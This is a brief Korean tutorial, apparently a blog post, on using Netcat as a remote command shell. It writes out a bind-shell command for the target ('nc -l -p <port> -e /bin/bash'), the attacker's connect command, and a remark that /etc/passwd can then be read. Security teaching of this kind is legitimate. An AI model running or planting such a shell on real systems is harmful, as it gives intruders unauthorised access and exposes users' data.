Netcat 을 이용한 커맨트 컨트롤

Netcat 은 TCP 또는 UDP 연결을 통해 원격으로 읽기 쓰기를 지원해 주는 네트워크 툴입니다.

Netcat 치트시트는 아래에서 다운로드 가능합니다.

https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf

[타켓] 접근하려는 타켓에서 네트워크를 통한 입력값을 기다린다. 아래 코멘드가 리모트로 전달되어 타켓에서 수행이 된다면 해당 머신에 접근이 가능합니다. 다만  옵션의 경우 우분투에서는 지원하지 않아 칼리 리눅스에서 확인하였습니다. 

nc -l -p <port> -e '/bin/bash' &

 

[공격자]

nc <target_IP> <port>

공격자는 이후 /etc/passwd 와 같은 사용자의 민감한 정보에 접근이 가능합니다.